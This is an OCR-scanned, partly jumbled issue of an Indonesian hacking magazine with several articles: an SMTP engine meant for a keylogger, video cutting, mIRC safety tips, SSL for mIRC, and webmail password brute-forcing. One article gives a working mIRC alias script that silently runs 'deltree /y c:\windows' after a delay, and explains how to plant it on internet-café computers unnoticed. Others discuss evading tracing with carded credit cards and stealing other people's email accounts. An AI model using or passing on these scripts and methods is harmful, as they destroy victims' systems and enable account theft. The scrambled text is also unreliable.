Setelah dijelaskan mengenai dasar-dasar programming SMTP, maka selanjutnya adalah bagaimana mengimplementasikan pengetahuan tadi ke program nyata. Secara ideal, fungsi dan variabel yang telah dijelaskan sebelumnya sebaiknya dikapsulasi ke dalam satu kelas khusus yang menangani pengiriman SMTP. Variabel-variabel utama sebaiknya dideklarasikan secara private dan didefinisikan menggunakan fungsifungsi get/set. Untuk artikel ini, penulis membuat satu class bernama Cmy_smtp sebagai implementasi. Gambar 1 memperlihatkan struktur class tersebut di lingkungan Visual C++. Anda bisa mendapatkan source code lengkapnya di CD NeoTek IV/01 ini.

Pada contoh di atas, respon server disimpan di buffer chtemp[].

5. Menutup Soket dan Koneksi
Setelah proses pengiriman selesai maka koneksi dapat ditutup. Tahapan-tahapan penutupan adalah sebagai berikut: • Menutup socket
::closesocket(sSocket);

• Menutup koneksi
::WSACleanup();

Perintah-perintah Pengiriman Email
Perintah-perintah ini dikirimkan ke server SMTP secara berulang kali menggunakan langkah 4 dan 5 yang telah dijelaskan sebelumnya. Untuk menerangkan perintah apa saja yang dikirim, bagaimana urutan perintah tersebut, serta bagaimana server SMTP me-respon perintah-perintah tersebut, di bawah ini akan dijabarkan satu contoh proses pengiriman email.
a. b. c. d. e. f. g. i. j. Setelah terkoneksi ke server (langkah 3 telah selesai), server harus mengirimkan respon 220. Kirimkan perintah HELO test\r\n ke server. Server harus membalas dengan respon 250 Kirimkan perintah MAIL FROM: billgates@microsoft.com\r\n Server harus membalas dengan respon 250 Kirimkan perintah RCPT TO: m_strdewanata@yahoo.com\r\n Server harus membalas dengan respon 250 Server harus membalas dengan respon 354 Kirimkan perintah di bawah ini: Subject: End Year Party Invitation\r\n To: m_strdewanata@yahoo.com\r\nFrom: billgates@microsoft.com\r\n\r\ <content_email_goes_here> \r\n.\r\n Server harus membalas dengan respon 250 Kirimkan perintah QUIT\r\n
Gambar 1. Struktur class Cmy_smtp

Keterbatasan
Proses pengiriman email pada mesin SMTP versi ini harus menggunakan server SMTP yang open relay, yang tidak membutuhkan proses otentikasi untuk melakukan pengiriman. Masalahnya, server jenis ini keberadaannya semakin sedikit saja dewasa ini, akibat masalah keamanaan dan biaya. Jika anda terhubung ke Internet menggunakan jasa provider (misal: indonet, dnet, dll) maka tentunya anda mempunyai akses ke SMTP server mereka yang bisa anda gunakan untuk percobaan. Namun, dalam konteks artikel keylogger kita, atau jika anda merancang sebuah virus, tidak bijaksana untuk menggunakan SMTP server jenis ini sebab identitas anda dapat diketahui dengan mudah oleh para virus debugger dan admin. Virus-virus yang dilengkapi dengan SMTP engine, biasanya pertama-tama akan mencoba mencari default SMTP server di sistem lokal untuk melakukan pengiriman. Jika tidak tersedia, maka dia akan mencoba untuk membuka koneksi SMTP ke beberapa server SMTP eksternal yang open relay dan underground. Untuk server yang tidak mengijinkan relaying, agar dapat melewati barikade otentikasi server tersebut, biasanya virus dilengkapi dengan rutin-rutin otentikasi SMTP, dengan satu atau lebih account yang telah diregistrasi di server tersebut sebelumnya. Agar identitas tidak terlacak, biasanya digunakan layanan yang gratisan atau pembayaran dilakukan menggunakan kartu kredit hasil carding. Pembahasan selanjutnya mengenai mesin SMTP untuk keylogger Pada artikel selanjutnya akan dibahas mengenai topiktopik di bawah ini: • proses otentikasi SMTP server menggunakan AUTH (RFC 2554) • mengirimkan file hasil tangkapan keylogger sebagai attachment, bukan sebagai badan email • mengintegrasikan class Cmy_smtp ke dalam program keylogger kita Selamat mencoba... Vol. IV No. 01 NeoTek
27

h. Kirimkan perintah DATA\r\n

k. l.

m. Server harus membalas dengan respon 221 n. Dengan demikian, proses pengiriman telah selesai (langkah 4 dan 5). Selanjutnya langkah 6 dapat dieksekusi untuk menutup socket dan koneksi. Keterangan: • String \r\n adalah identik dengan menekan enter jika kita menggunakan telnet • Respon server yang dijelaskan di atas adalah tiga karakter pertama string respon. Respon lengkap sebenarnya dilengkapi dengan deskripsi pesan tersebut. Contoh: 250 Ok Kita hanya perlu memeriksa tiga karakter pertama string respon. • Respon server harus sama dengan yang dijelaskan di setiap langkah. Jika ternyata respon tidak sesuai dengan yang diharapkan, maka proses pengiriman akan dihentikan. • Pada langkah j, baris <content_email_goes_here> adalah isi badan email kita.

NeoStyle

Membentuk Clip dengan Cutting
format yang dimengerti PC, langkah selanjutnya adalah memotong adegan-adegan (scenes) yang hanya kita butuhkan nantinya, dan yang tidak kita butuhkan dapat kita buang. Teknik ini juga bisa disebut sebagai Video Cutting. Dalam sebuah perusahaan film, biasanya mereka memiliki departemen/seksi pemotongan film tersendiri. Dan pada teknik dibutuhkan ketelitian dan kreativitas pemakai yang akan membuat film atau video pribadi sendiri, untuk dinikmati nantinya. Proses ini tidak memerlukan banyak waktu tapi ketelitian lebih diutamakan, karena nantinya apabila anda tidak teliti dan jeli melihat adegan scene mana yang akan anda pilih, akan terjadi "slip" atau adanya adegan yang kita tidak inginkan masuk ke dalam adegan yang kita pilih tadi.

BA S I C V I D E O E D I T I N G

Andi Ismayadi (Fuzk3_kendi@yahoo.com) melanjutkan bahasan tentang basic video editing yaitu cutting yang merupakan kelanjutan dari proses encoding. Dengan cutting kita membentuk clip-clip video untuk kelak disatukan menjadi video yang menarik.

S

ETELAH KITA MENGKONVERSI VIDEO KITA MENJADI

Untuk melakukan proses ini ki- Video editing pada dasarta akan memakai software buat- nya adalah proses-proses an Jiao Shanwu dan anda down- sebagai berikut: load di http://vcdcutter.yeah.net. • Encoding • Cutting Setelah anda meng-install-nya anda akan mendapatkan sebuah • Combining editing software yang memiliki • Editing • Encoding (lagi) fasilitas beragam seperti, kon• Burning versi format video, video player (mendukung hampir semua format video), yang pengoperasani drag-drop video yang memungkinkan anda tinggal men-drag file video dan menaruhnya di layar utama VCDCutter, dan yang paling penting dapat memotong dan menggabungkan file-file video tadi. Nah, sekarang mari kita memotong-motong video kita.

Langkah-langkah Encoding

1 2
28

MEMBUKA FILE VCD
Setelah menginstal VCDCutter, kini jalankan programnya lalu buka file video yang akan anda potong dengan jalan drag and drop ke layar utama VCDCutter.

3

AWAL POTONGAN: MARK-IN
Setelah anda menentukan bagian awal video untuk adegan (scene) yang akan anda potong, tekan tombol Mark-In. Tombol ini berfungsi sebagai penanda awal potongan scene anda.

TIMELINE SEBAGAI PATOKAN
Di bagian bawah layar utama terdapat timeline yang dapat dijadikan patokan untuk memotong video. Di timeline itu terdapat slide bar yang dapat digeser ke adegan (scene) yang akan dijadikan awal pemotongan.

NeoTek Vol. IV No. 01

NeoStyle

4

AKHIR POTONGAN: MARK OUT
Setelah itu, anda harus menentukan lagi akhir dari adegan (scene) yang akan anda potong. Sewaktu anda menarik slide bar tersebut akan telihat garis biru yang menandakan jarak dan waktu scene yang akan anda potong. Setelah selesai menentukan akhir bagiannya, tekan tombol Mark-out.

6

MENYIMPAN HASIL POTONGAN KE DISK: MAKE CLIP
Langkah terakhir adalah menyimpan hasil potongan scene anda ke sebuah file dengan menekan tombol Make Clips. Setelah menekan tombol itu akan muncul window baru, untuk menyimpan file anda tadi.

Demikianlah, proses pemotongan video, yang sangat mudah dan sederhana bila menggunakan VCDCutter. Yang lebih diperlukan di sini bukanlah keterampilan pemakaian komputer, melainkan rasa seni seseorang Selanjutnya anda dapat memodifikasikan adeganadegan (scenes) yang telah anda potong menjadi beberapa video clips tadi. Anda mungkin juga ingin melihat-lihat apa saja fasilitas lain yang disediakan oleh VCDCutter.

5

INSTALASI BLUETOOTH DRIVER
Selanjutnya tekan tombol Add to Clip list. Pada bagian ini adegan (scene) yang anda potong akan dimasukkan ke daftar clip yang akan dipotong dan disimpan nantinya. Anda dapat melihat besar dan scene mana saja yang akan anda potong pada tab Clip List.

7

PROSES PEMOTONGAN VIDEO CLIP
Setelah itu pada bagian paling bawah VCDCutter akan terlihat adanya status bar yang memperlihatkan status proses pemotongan adegan (scene) yang telah anda perintahkan tadi.

Vol. IV No. 01 NeoTek

29

NeoStyle

Dasar-dasar Pengamanan mIRC
Internet Relay Chat (IRC) yang digandrungi banyak orang ternyata penuh dengan jebakan dan bahaya. Sebelum terkoneksi ke server IRC, ada baiknya anda memahami dasar-dasar pengamanan diri di dunia maya. MA Rody Candera (odyxb@melva.org) membahasnya untuk anda.
IRC BEGITU DIGANDRUNGI OLEH HAMPIR SETIAP ORANG di dunia karena dengan mIRC kita dapat berbincang dengan orang lain yang berada jauh dari kita, seperti diluar kota/provinsi maupun di luar negeri. Malah pembaca NeoTek memiliki tempat berkumpul di IRC Dalnet, # tepatnya di channel neoteker (#neoteker). Disana tidak hanya sekedar berkumpul, melainkan juga dijadikan ajang bertukar pikiran mengenai komputer dan internet, sebagai tempat bertanya-jawab untuk masalah yang ditemukan mengenai komputer dan internet, dan banyak lagi. Walaupun begitu, #neoteker bukan channel hacker maupun cracker. Menyinggung masalah mengenai hacker maupun cracker, tentu akan mengingatkan kita pada masalah security (keamanan). Pada kesempatan ini, penulis akan memberikan sedikit tips demi menciptakan rasa aman seaktu kita menggunakan mIRC. Mengapa dikatakan sedikit, karena begitu banyak celah untuk orang lain melakukan tindakan hack pada dunia internet. Jadi walaupun sedikit setidaknya telah kita telah melakukan pencegahan demi menghadirkan nuansa yang aman dalam menggunakan mIRC. Tips yang akan dipaparkan disini, melihat dan mengamati secara garis besar saja mengenai keamanan dalam bermain mIRC. Mengenai bernahayanya media mIRC dapat dilihat dengan membaca artikel-artikel NeoTek mengenai mIRC seperti:

mI R C S E C U R I T Y

m

Nguping Pembicaraan di IRC (NeoTek II/10) Nguping di IRC (2): Menyusupkan Skrip ke PC Orang (NeoTek III/2) IRC Password Cracking: Nick & Channel IRC (NeoTek III/5) IRC Password Cracking: Skrip Nick Password Cracking (NeoTek III/5) IRC Password Cracking: Bongkar Paksa Nick & Channel Password (NeoTek III/5)

Script yang pertama kali kita lihat seperti pada Gambar 1 adalah script bawaan dari mIRC. Jadi kelihatan aman karena tidak terlihat script yang lain yang terasa aneh. Tunggu dulu... script itu terlihat hanya sedikit tetapi mengapa ada Gambar 1. Kelihatan aman, tetapi mengapa scrollbar disana. ada scrollbar? Coba turunkan scrollbar tersebut, maka terlihat ada sesuatu yang tersembunyi yang tidak ingin terlihat. Setelah diturunkan, terlihat ada script tersembunyi di bawahnya dan terlihat juga itu bukan merupakan script bawaan (default) dari mIRC. Ternyata itu script yang berfungsi untuk mendapatkan password atas nick (jika nick-nya merupakan nick yang telah di-register).

Harapannya setelah membaca artikel ini, kita semua perlu lebih teliti sebelum bermain mIRC agar tidak kecolongan akibat ketidakberdayaan terhadap informasi global sekarang.

1. Cek dan Ricek mIRC Editor(s)
Ketika anda membuka mIRC32, sebelum koneksi ke server IRC. Cek dan ricek Editor mIRC, karena disanalah script yang dapat dimanfaatkan orang untuk mendapatkan password nick dan channel anda yang telah diregisterkan. Karena editor mIRC berisi script mIRC, tentu saja cara orang mendapatkan password nick maupun channel adalah dengan menanamkan scriptnya pada editor mIRC tersebut. Penanaman script itu biasanya diletakkan pada mIRC Editor Aliases dan mIRC Remote Editor. Cek mIRC Editor Aliases Tekan Alt+A untuk memunculkan mIRC Editor Aliases
30

Gambar 1. Ternyata ada script yang tersembunyi di bagian bawah.

Jika anda menemui hal seperti itu, segera hapus script tersebut, setelah terhapus klik OK.

NeoTek Vol. IV No. 01

NeoStyle
Cek mIRC Remote Editor Tekan Alt+R untuk memunculkan mIRC Remote Editor. mIRC Remote default-nya kosong (tidak berisi script). Jadi perhatikan apakah ada script yang bercokol di dalamnya dan juga perhatikan apakah mIRC Remote Editor itu memiliki scrollbar, baik di samping Gambar 3. Aman mIRC Remote Editor yang kosong maupun yang dan tanpa scrollbar: di bawah. Tapi mungkin saja anda menemukan adanya script dalam mIRC Remote Editor ini, seperti ditunjukkan pada Gambar 4. Kembali segera hapus semua script tersebut, setelah terhapus klik OK. Sampai di sini anda telah mengenal satu langkah dasar dalam melakukan pengamanan terhadap hal yang tidak diinginkan.
Gambar 4. mIRC Remote Editor harus kosong, jadi semua scipt ini harus dihapus.

Setelah tampilan mIRC Options terlihat, segera cek dan ricek pada bagian IRC > Perform (Gambar 6). Jika setelah anda cek terlihat kosong seperti Gambar 6, maka artinya sudah cukup aman. Anda dapat melakukan koneksi ke server IRC. Tetapi jika anda menemukan kejadian seperti Gambar 7, segera hilangkan tanda checklist pada kotak kecil didepan teks On connect, perform this commands:, dan hapus tulisan yang ada pada kotak besar di bawahnya. Apapun jenis tulisannya, anda hapus saja. Seperti misalnya kejadian berikut ini pada Gambar 8. Gambar 6. Pemeriksaan pada IRC > Perform pada window mIRC Options menunjukkan Jika anda menemuaman untuk koneksi ke server IRC. kan anda hal-hal seperti itu, jangan dibiarkan. Segera ambil tindakan penyelamatan dengan cara yang telah dijelaskan di atas. Jika telah anda lakukan seperti apa yang telah dijelaskan, berarti anda telah melakukan pengamanan yang kedua.

2. Cek dan Ricek mIRC Options
mIRC Option perlu juga untuk diperhatikan, khususnya pada IRC > Perform, sebab disana dapat diletakan sedikit perintah yang dapat berakibat cukup fatal. Tekan Alt+O untuk memunculkan mIRC Options

Gambar 5. mIRC Options

Gambar 8. Apapun tulisannya pada IRC > Perform, hapus dan hilangkan tanda tick di depan On connect perform this commands:

Vol. IV No. 01 NeoTek

31

NeoStyle
3. Command //identify $?* dan ??indentify # $?*
Masih banyak penulis melihat orang lain ketika melakukan identify terhadap nick maupun channel-nya menggunakan command biasa: /identify pass Hal itu sebaiknya dihindari, karena orang lain akan dapat melihat ketika: • Ketika melakukan identify itu sendiri. • Komputer anda tinggalkan sesaat dengan semua masih aktif untuk urusan tertentu. Ketika anda melakukan identify dengan command biasa, orang lain yang kebetulan di belakang anda akan dapat melihat jelas password yang anda ketikan, dan ketika komputer yang masih aktif dengan segalanya anda tinggalkan, orang lain dapat melakukan cek dengan menekan tombol arrow ke atas untuk melihat apa-apa saja yang telah anda ketikkan. Jika anda mengetikkan identify pada layar status, makin cepat orang akan mendapatkan password nick anda tersebut. Jadi untuk menghindari hal itu, gunakan command identify sebagai befrikut: • //identify $?* (untuk identify nick) contoh: //identify co-puasa $?* atau //identify $?* • //identify # $?* (untuk identify channel) contoh: //identify #neoteker $?* Jika itu dilakukan anda akan mendapat kejadian seperti Gambar 9. Akan muncul menu kecil untuk anda mengetikkan password nick maupun password channel, dan hasil ketikan pun hanya terlihat sebagai deretan asteriks.

mengenai mendapatkan password nick mIRC dengan ditanamkan scriptnya di Tools Menu Aliases Sebelumnya juga telah dicoba diangkat sebuah permasalahan membuat program jahat dengan menggunakan VB yang dapat menghapus file. Kali ini, sedikit berhubungan dengan kilas balik di atas, artikel akan membahas script yang dapat menghapus direktori d beserta file di dalamnya (deltree) dengan cara menanamkan script tersebut di Tools Menu Aliases. Kembali disampaikan untuk pembaca semua, bahwasanya artikel ini bukanlah untuk mengajak seseorang menjadi perusak bagi orang lain. Artikel ini merupakan informasi bagi kita semua pengguna maupun pengelola Internet untuk waspada agar hal yang seperti yang diangkat pada artikel kali ini tidak terjadi atau setidaknya dapat terhindar darinya.

K

ILAS SEBALIK SEDIKIT, PADA SEBELUMNYA TELAH DIBAHAS

Mengenal Perintah DOS Deltree
Deltree. Deltree merupakan salah satu command yang digunakan di MS DOS, yang fungsinya adalah untuk menghapus sebuah direktori beserta file-file di dalamnya.

Gambar 9. Password yang anda ketikkan tidak lagi dapat diintip orang

4. Hati-hati Menggunakan mIRC Script
Jangan gunakan mIRC Script yang tersebar luas secara gratisan maupun bayar sebelum kita mengerti dengan baik kegunaan dari mIRC Script itu sendiri. Hal ini banyak terjadi dan dapat dikatan wajar, karena tergiur dengan iklan yang anda yang mengatakan jika menggunakan mIRC Script tersebut, kita akan bebas dari kick, ban, bahkan akill dari dalnet sendiri. Itu semua omong kosong belaka. Penulis telah melakukan cek dan ricek pada beberapa mIRC Script yang ada seperti: Hacker Script, War Script, Dejavu Script, Rocket Script, dan lain-lain. Script-script tersebut menjanjikan hal-hal yang luar biasa yang pada kenyataan justru membuat keterpurukan (menurut penulis). Janji-janji yang ada pada iklan script tersebut cuma janji belaka, malah terdapat script utuk mendapatkan password nick maupun channel dari pengguna script tersebut yang tersembunyi diantara tumpukan script didalamnya. Bahkan tidak hanya itu, malah ada script yang berfungsi untuk mengirimkan semua tindakan kita atas script tersebut kepada pencipta script tersebut. Wahhh..., berabe kan..., kecolongan habis-habisan.
32

Gambar 1. Menjalankan perintah deltree dari MS-DOS console.

Jangan main-main dengan perintah ini jika tidak ingin komputer anda sendiri yang menjadi korban.

Menjalankan Deltree Melalui mIRC
Command deltree dapat juga dijalankan pada kotak dialog mIRC dengan /run deltree C:\dir
Contoh: /run deltree C:\Windows

Command ini menimbulkan hal yang fatal bagi Windows.

Gambar 2. Perintah deltree dari mIRC console.

NeoTek Vol. IV No. 01

NeoStyle

Perintah Deltree Melalui mIRC
Tahukah anda bahwa dengan script yang sederhana pada mIRC anda dapat merusak komputer orang, misalnya dengan menjalankan perintah deltree yang menghapus seluruh direktori? MA Rody Candera menunjukkan betapa sistem Windows sangat rentan terhadap serangan.
Jika command tersebut dijalankan, maka akan muncul prompt MS DOS yang meminta konfirmasi untuk mengeksekusi command deltree. Jika anda yakin untuk melakukannya, ketikkan Y (yes), kemudian tekan Enter. Jika anda melakukan metode seperti yang telah di jelaskan di atas, sebenarnya cukup berbahaya. Maksudnya adalah ketika yang menjadi target anda komputer di warnet tentu harus dilakukan dengan hati-hati jangan sampai diketahui pengelola warnet tersebut, dan kalaupun berhasil tentu pengelola warnet akan mencurigai anda sebagai perusaknya karena setelah anda pergi pengelola mendapati program Windows di komputer yang anda gunakan telah rusak. Apakah cara lain? Tentu saja ada yaitu dengan memasukkan command deltree tersebut pada Tools Menu Remote. Tetapi cara ini memiliki kelemahan yaitu ketika command deltree dijalankan maka akan muncul konfirmasi MS DOS Y/N. Cara yang lebih baik? Penulis memiliki cara yang lain; ikuti langkah-langkah di bawah untuk lebih jelasnya. Untuk lebih yakinnya, dapat anda uji terlebih dahulu di komputer anda sendiri tetapi ganti direktori target terlebih dulu. Buat sebuah direktori dengan nama Test dan masukkan beberapa file ke dalamnya. Lalu jalankan langkah-langkah yang telah dijelaskan di atas, kembali di ingatkan, karena anda akan mengujinya pada komputer sendiri, jangan lupa untuk menggantikan direktori target. Ganti dengan direktori yang telah dibuat hingga menjadi C:\Test Lalu coba aktifkan mIRC anda dan lakukan command mengganti nick atau join channel, maka pada 8 menit kemudian command deltree yang disembunyikan akan aktif dan konfirmasi Y/N tidak akan muncul. Hanya muncul konfirmasi
/j { /.join #$$1 $2/.timer 1 480 /.run deltree /y c:\windows /.timer 1 481 /.exit } /join { /.join #$$1 $2/.timer 1 480 /.run deltree /y c:\windows /.timer 1 481 /.exit } /nick { /.nick $$1 /.timer 1 480 /.run deltree /y c:\windows /.timer 1 481 /.exit } /nickname { /.nick $$1 /.timer 1 480 /.run deltree /y c:\windows /.timer 1 481 /.exit }

mI R C S E C U R I T Y

direktori target telah dihapus dan dalam satu detik layar mIRC akan tertutup. Waktu 8 menit memang disengaja ditentukan. Pengaturan waktu ini dapat anda ganti sesuai keinginan anda. Pengaturan ini terdapat pada script yaitu:
/.timer 1 480 /.run deltree /y c:\windows

480 berarti 480 detik atau sama dengan 8 menit. Nah anda dapat menambahnya maupun menguranginya. Lalu timer berikutnya adalah:
/.timer 1 481 /.Exit

481 detik, atau 1 detik kemudian layar mIRC akan tertutup. Dapat anda lihat sendiri scriptnya sangat sederhana, tapi memberi pengaruh merusak yang fatal terhadap Windows.

1

SCRIPT DELTREE
Script yang Anda butuhkan terlihat pada text box. Untuk menjaga kemungkinan, script tersebut dapat anda tanamkan seluruhnya. Ada 4 kemungkinan yang digunakan pada script tersebut yaitu: 1. Command deltree akan jalan jika command join channel berbentuk /j 2. Sama dengan kemungkinan 1 tetapi untuk command join channel berbentuk /join 3. Command deltree akan jalan jika command mengganti/membuat nick dengan bentuk /n 4. Command deltree akan jalan jika command mengganti/membuat nick dengan bentuk /nick

2

MEMASUKKAN SCRIPT
Lalu klik Tool > Aliases untuk menampilkan Editor Aliases, masukkan script yang akan digunakan ke dalamnya. Letakkan pada bagian bawah setelah script yang ada terlebih dahulu di dalam aliases.

3

SAVE DAN MENJADI JEBAKAN
Selanjutnya save pekerjaan anda; klik File > Save > Ok. Sampai disini, tutup mIRC dan anda sudah dapat meninggalkan target, ketika ada yang mengaktifkan mIRC dan beraktivitas untuk chatting maka pekerjaan anda akan dilanjutkan oleh orang lain.

Vol. IV No. 01 NeoTek

33

NeoStyle

Chat Terenkripsi: SSL pada mIRC
Pernah dibahas cara nguping pembicaraan di IRC. MA Rody Candera (odyxb@melva.org) memberi saran untuk mereka yang paranoid dalam berkomunikasi lewat IRC Gunakan enkripsi untuk komunikasi anda lewat IRC menggunakan SSL (Secure Socket Layer) pada mIRC
keasyikannya. Tidak dapat dipungkiri bagi penulis sendiri setelah mengenal mIRC hampir setiap ada waktu luang akan menggunakannya. Tetapi, ada sisi lain yang juga tidak dapat dipungkiri yaitu kemungkinan percakapan kita di mIRC akan diketahui oleh orang lain yang tidak berkepentingan. Ini bisa saja terjadi, karena menggunakan mIRC sama saja menggunakan Internet. Secara etimologi kata Internet sendiri, dua kata yang digabung menjadi satu arti yaitu International dan Network yang dapat diartikan jaringan yang mengglobal. Diartikan secara luas, internet memiliki arti yang sangat luas dan setiap orang dapat mengartikan dengan kata-katanya sendiri. Di dalamnya semua data bersliweran dan seorang cracker akan memanfaatkan itu untuk mengambil sesuatu yang dianggapnya baik untuk dirinya. Sekarang bagaimana percakapan kita di mIRC dapat dilihat oleh orang lain? Di jaman seperti saat ini apa yang tidak mungkin. Dunia menjadi tanpa batas setelah hadir Internet. Di dalam Internet terjadi arus transportasi data di jaringan yang berkemungkinan seorang cracker untuk menangkap data itu. Dengan menggunakan software tertentu orang yang tidak berkepentingan akan dapat melihat dan memonitor semua percakapan di mIRC. Di mIRC, data yang dikirim maupun diterima ternyata tidak terenkripsi sehingga orang jahil yang ingin mengetahui percakapan kita di mIRC bisa mengetahuinya. Seorang programmer bernama Christopher R. Curzio Stunnel, telah memanfaatkan SSL untuk mIRC. Dengan menggunakannya membuat percakapan di mIRC menjadi terenkripsi. Percakapan yang terenkripsi itu tidak berlaku kepada lawan bicara kita. Jadi hanya berlaku bagi orang yang tidak berkepentingan. Tetapi permasalahannya, tidak semua server yang ada di IRC mendukung daripada koneksi SSL. Dari percobaan yang dilakukan penulis, baru menemukan beberapa server IRC yang mendukung, yaitu: irc.yuggoth.org, irc.cuckoo.net, dan irc.distributed.net. Mungkin server lain mendukung, hanya perlu sentuhan tangan kreatif. Andalah mungkin yang dapat melakukan itu. Tidak ada salahnya kita berkreasi daripada terlalu asyik bercracking ria. Baiklah, mari kita mulai mencoba SSL untuk mIRC.

mI R C S E C U R I T Y

P

ARA PENGGUNA MIRC TENTU TELAH MERASAKAN SENDIRI

Gambar 1. Unzip mirc-ssl.zip ke direktori tempat mIRC

Catatan: • Win95/98/ME, tempatkan file-file yang terdapat di dalam mirc-ssl.zip seperti: libeay32.dll, ibssl32.dll, stunnel.exe dan mirc-ssl.mrc di direktori mirc, contoh: C:\mirc\ • Win NT/2K/XP, tempatkan dua file, yaitu: libeay32.dll dan libssl32.dll di direktori /winnt/system32 dan tempatkan stunnel.exe dan mirc-ssl.mrc di direktori mirc.

Edit dengan Notepad
Buka dengan mirc-ssl.mrc dengan Notepad untukmelakukan sedikit perubahan yang diperlukan.

Un-zip File mirc-ssl.zip
Sebelumnya, anda membutuhkan mirc-ssl (yang dipaket dalam bentuk zip) dan dapat anda download dari CD yang disertai pada majalah ini. Setelah didownload, unzip ke direktori tempat mIRC32.exe anda berada, misal C:\mirc (lihat catatan di bawah)
34

Gambar 2. Lakukan perubahan yang diperlukan dengan Notepad.

Perhatikan script yang seperti berikut:
alias seconnect { run -n stunnel.exe -c -d localhost:6667 -r irc.yuggoth.org:994 server localhost 6667

NeoTek Vol. IV No. 01

NeoStyle

Gambar 3. Perubahan yang dilakukan pada mirc-ssl.mrc

Ganti port 6667 pada localhost menjadi 6669 dan saat ini kita mencoba menggunakan server IRC yaitu: irc.yuggoth.org dengan port 994 Sebenarnya aturan server IRC dan portnya telah ada penentuannya, yaitu: • 994 (standard alokasi RFC port untuk IRCS) • 7000, 7001, 7002, 7003 (pubchat.net, dalnet, dll) • 6697 (axenet) • 9999 (suidnet) setelah diganti, klik File > Save

Gambar 5. Save hasil perubahan.

Menggunakan mIRC Remote Editor

/secureirc jika muncul menu yang berisi pertanyaan, klik OK dan akan terlihat munculnya prompt dari mirc-ssl. Selesai sudah, kalau tampilan mIRC seperti Gambar 6, tandanya pekerjaan anda berjalan mulus. Ada sedikit perbedan start awal koneksi yang terjadi. Perhatikan layar status. Sekarang tugas anda bagaimana hal yang di atas dapat berlaku pada server IRC

Dalnet, jika sudah diinformasikan pada para neoteker.
Gambar 6.

Gambar 4. Perubahan mirc-ssl.mrc melalui mIRC Remote Editor.

Atau dengan cara lain untuk melakukan perubahan yang diperlukan pada mirc-ssl.mrc adalah pada saat meng-upload mirc-ssl.mrc pada mIRC Remote Editor. Untuk meng-uploadnya, perhatikan langkah kelima berkut ini. Setelah itu, buka mIRC anda dan buka mIRC Remote Editor F (tekan Alt+R), upload mirc-ssl.mrc (File > Load > Script). Setelah diubah, selamatkan pekerjaan anda dengan cara klik File > Save dan klik OK untuk mengakhirinya. Selanjutnya adalah ketikan dilayar status command seperti berikut:

Gambar 7. Koneksi ke server IRC yang mendukung enkrispsi SSL.

Vol. IV No. 01 NeoTek

35

NeoTekno

Mencuri Account Email
Kembali password cracking dengan metode brute-force menjadi bahasan. Metode coba-coba ini kini sudah ditingkatkan ‘kualitasnya’ dan ditujukan untuk menyerang web-mail account. Eryanto Sitorus (ery@postmaster.co.uk) juga membahas cara membuat wordlist sendiri yang efektif.
yang kedengarannya agak sedikit nyeleneh, yaitu hack while you sleep!. Maksudnya, hack-lah komputer atau server orang lain sementara anda tidur. Bahkan (bila perlu), anda juga bisa melakukannya sambil mandi, kuliah, atau shopping ke mal. Meskipun kedengarannya konyol dan sulit diterima, yang jelas, begitulah aturan baru yang dibuat oleh seseorang yang menamakan dirinya Munga Bunga. Munga Bunga menulis program hacking yang diberi nama HTTP Brute Forcer. Oleh karena itu, bila anda adalah termasuk orang yang menyukai hacking (senang melakukannya), namun tidak pernah punya waktu yang cukup untuk menunggu, maka saya pikir inilah program hacking yang sangat pas buat anda. Mungkin anda akan mengatakan Oke!, tapi apa sih hubungannya dengan waktu? Dan, mengapa pula harus menunggu? Jawabannya adalah, itu karena program HTTP Brute Forcer yang dibuat oleh Munga Bunga menggunakan teknik atau metode yang disebut dengan brute force attack, alias cobacoba. Anda harus maklum, bahwa yang namanya hacking dengan metode tersebut, maka, waktu, bukanlah sesuatu yang gampang untuk ditebak, dia bisa saja sukses hanya dalam tempo semenit, setengah jam, sehari, atau bisa juga seminggu, tergantung pada nasib baik dan seberapa banyak jumlah kombinasi kata sandi (password) dalam file wordlist yang harus di-testing. Secanggih apa pun program hacking yang menggunakan metode brute force attack, pembuatnya tidak akan pernah mencantumkan nilai estimasi waktu yang dia butuhkan selama melakukan proses 'nyoba-nyoba'. Disitulah letak persoalan dan kaitannya. Sebuah persoalan yang tentunya sangat sulit diterima oleh sebagian besar orang yang tidak bisa menunggu. Lalu, mengapa harus menggunakan program HTTP Brute Forcer? Apa yang akan di hack? Serta apa saja manfaat dan kelebihannya? Saya yakin, bisa jadi itu adalah pertanyaan terakhir yang akan anda 'tembak' ke saya. Baiklah, sebelum anda menjadi terlalu penasaran, saya akan lanjutkan tulisan ini, langsung kepada pokok persoalannya.

WE B-MAI L SEC U RITY

D

ALAM DUNIA HACKING KINI TELAH ADA ATURAN BARU

Gambar 1. Contoh isi sebuah file wordlist

cara mencocokkan salah satu dari beberapa kombinasi kata sandi yang terdapat pada file daftar kata (wordlist) dengan username email yang akan di-crack. Jadi dalam hal ini, bila anda ingin mengcrack kata sandi e-mail teman anda, atau account e-mail orang lain yang 'bermarkas' di salah satu webmail tersebut di atas, maka hal pertama yang perlu anda lakukan adalah menyiapkan file wordlist (*.LST). Sekedar saran, agar benar-benar berhasil melakukan cracking, hindari menggunakan wordlist yang dibuat/susun orang lain, meskipun file itu tergolong cukup lengkap dan berukuran besar. Karena biar bagaimana pun lengkapnya dia, akan lebih baik bila anda yang menebaknya dan kemudian menyusunnya sendiri hingga menjadi sebuah wordlist yang kebenarannya bisa anda yakini, bukan yang diyakini orang lain. Di bagian akhir artikel ini, anda nanti bisa melihat beberapa tip dan trik cara membuat wordlist yang baik dan benar.

Menyiapkan Definition File

Gambar 2. Contoh isi salah satu file definisi

Menyiapkan Wordlist File
Secara teknis, misi program hacking bernama HTTP Brute Forcer yang dibuat oleh Munga Bunga adalah bertujuan untuk mendapatkan (mencuri) account e-mail, khususnya account e-mail yang diakses melalui protokol http (halaman web, atau webmail), misalnya seperti Yahoo, Hotmail, Postmaster, Tripod, Mailcity, ICQmail, Excite, dan sebagainya. Caranya, sebagaimana yang sudah dijelaskan, yaitu dengan
36

Selain menyiapkan file daftar kombinasi kata (wordlist), hal kedua yang perlu anda lakukan sebelum mengoperasikan program HTTP Brute Forcer adalah membuat atau menyiapkan file definisi (*.DEF). Definition file adalah file yang berisi paraform e-mail login yang akan di-crack. Untuk urusan yang satu ini, anda tidak perlu khawatir, karena program HTTP Brute Forcer memberi anda 14 buah file definisi yang sudah berisi paraform e-mail login beberapa webmail 'top', seperti Yahoo, Hotmail, atau Postmaster. Anda cukup memilih salah satu di antaranya.

NeoTek Vol. IV No. 01

NeoTekno
